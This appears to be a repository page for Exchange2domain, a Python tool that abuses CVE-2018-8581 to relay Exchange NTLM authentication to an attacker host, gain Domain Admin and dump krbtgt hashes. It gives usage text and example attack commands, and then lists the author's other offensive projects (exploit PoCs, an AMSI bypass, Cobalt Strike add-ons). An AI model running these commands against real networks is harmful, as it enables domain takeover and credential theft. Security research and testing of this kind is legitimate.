• Stars: 358
• Rank: 118,855 (Top 3%)
• Language: Python
• License: MIT License
• Created almost 6 years ago
• Updated over 1 year ago

Repository Details

CVE-2018-8581

Exchange2domain

Python 2.7

All-in-one tool for privexchange. You only need to open the web server port, so no high privileges are required.

Great writeup! Abusing Exchange: One API call away from Domain Admin.

Requirements

These tools require impacket. You can install it from pip with pip install impacket.

Usage

usage: Exchange2domain.py [-h] [-u USERNAME] [-d DOMAIN] [-p PASSWORD]
                          [--hashes HASHES] [--no-ssl]
                          [--exchange-port EXCHANGE_PORT] -ah ATTACKER_HOST
                          [-ap ATTACKER_PORT] -th TARGET_HOST
                          [-exec-method [{smbexec,wmiexec,mmcexec}]]
                          [--exchange-version EXCHANGE_VERSION]
                          [--attacker-page ATTACKER_PAGE]
                          [--just-dc-user USERNAME] [--debug]
                          HOSTNAME

Exchange your privileges for Domain Admin privs by abusing Exchange. Use me
with ntlmrelayx

positional arguments:
  HOSTNAME              Hostname/ip of the Exchange server

optional arguments:
  -h, --help            show this help message and exit
  -u USERNAME, --user USERNAME
                        username for authentication
  -d DOMAIN, --domain DOMAIN
                        domain the user is in (FQDN or NETBIOS domain name)
  -p PASSWORD, --password PASSWORD
                        Password for authentication, will prompt if not
                        specified and no NT:NTLM hashes are supplied
  --hashes HASHES       LM:NLTM hashes
  --no-ssl              Don't use HTTPS (connects on port 80)
  --exchange-port EXCHANGE_PORT
                        Alternative EWS port (default: 443 or 80)
  -ah ATTACKER_HOST, --attacker-host ATTACKER_HOST
                        Attacker hostname or IP
  -ap ATTACKER_PORT, --attacker-port ATTACKER_PORT
                        Port on which the relay attack runs (default: 80)
  -th TARGET_HOST, --target-host TARGET_HOST
                        Hostname or IP of the DC
  -exec-method [{smbexec,wmiexec,mmcexec}]
                        Remote exec method to use at target (only when using
                        -use-vss). Default: smbexec
  --exchange-version EXCHANGE_VERSION
                        Exchange version of the target (default: Exchange2013,
                        choices:Exchange2010,Exchange2010_SP1,Exchange2010_SP2
                        ,Exchange2013,Exchange2013_SP1,Exchange2016)
  --attacker-page ATTACKER_PAGE
                        Page to request on attacker server (default:
                        /privexchange/)
  --just-dc-user USERNAME
                        Extract only NTDS.DIT data for the user specified.
                        Only available for DRSUAPI approach.
  --debug               Enable debug output

example:

python Exchange2domain.py -ah attackerip -ap listenport -u user -p password -d domain.com -th DCip MailServerip

If you only want to dump krbtgt, use --just-dc-user.

example:

python Exchange2domain.py -ah attackerip -u user -p password -d domain.com -th DCip --just-dc-user krbtgt MailServerip

Update

Automatically backs up the old SD so that it can be restored.

More Repositories

1

Intranet_Penetration_Tips

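Intranet penetration tips compiled in early 2018. Updates have since been slow, so they are published here in the hope that others will help update and maintain them.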
4,089
star
2

noPac

Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user
Python
567
star
3

CVE-2017-11882

CVE-2017-11882 from https://github.com/embedi/CVE-2017-11882
Python
531
star
4

Pentest

tools
C
524
star
5

cve-2020-0688

cve-2020-0688
Python
315
star
6

acefile

POC of https://research.checkpoint.com/extracting-code-execution-from-winrar/
Python
270
star
7

CVE-2019-1040

CVE-2019-1040 with Exchange
Python
237
star
8

Mailget

Guess corporate email addresses from Maimai users
Python
227
star
9

get_ip_by_ico

Find websites that use the same favicon.ico via Shodan
Python
190
star
10

CVE-2018-15982_EXP

exp of CVE-2018-15982
Python
181
star
11

PySQLTools

MSSQL exploitation tool
Python
165
star
12

RTF_11882_0802

PoC for CVE-2018-0802 And CVE-2017-11882
Python
164
star
13

owa_info

A small tool for retrieving Exchange information
Python
160
star
14

RelayX

NTLM relay test.
Python
156
star
15

CS_Chinese_support

Cobalt Strike modified to support displaying Chinese output.
145
star
16

MyJSRat

This is JSRat.ps1 in Python
Python
134
star
17

AMSI_bypass

XSLT
78
star
18

SharpAddDomainMachine

SharpAddDomainMachine
C#
68
star
19

proxyshell_payload

proxyshell payload generate
Python
67
star
20

cs_custom_404

Cobalt strike custom 404 page
HTML
61
star
21

GhostPotato

Just pick out the code we need.
Python
52
star
22

pyForgeCert

pyForgeCert is a Python equivalent of the ForgeCert.
Python
51
star
23

DomainHiding

external c2 use domainhiding.
Go
48
star
24

hackredis

Python
42
star
25

p12tool

A simple Go script to brute force or parse a password-protected PKCS#12 (PFX/P12) file.
Go
39
star
26

MSSQL_CLR

MSSQL CLR for pentest.
C#
35
star
27

CVE-2019-1040-dcpwn

CVE-2019-1040 with Kerberos delegation
Python
32
star
28

WebDAV

Set Up WebDAV Server for Remote File Sharing and more
Shell
31
star
29

warp_proxy

cloudflare socks5 server
Shell
31
star
30

atexec-pro

Fileless atexec, no more need for port 445
Python
29
star
31

tshtun

The tsh traffic encryption and decryption process, written in Python.
C
25
star
32

xslt_poc

Execute code from XSLT
XSLT
17
star
33

mousejack_replay

mousejack hack
Python
11
star
34

Python_Codes

some python codes
Python
9
star
35

Cortana

Some Cortana scripts
Ruby
3
star
36

comment

orz..
2
star
37

gitTun

Git tun
Python
1
star
38

Ridter

1
star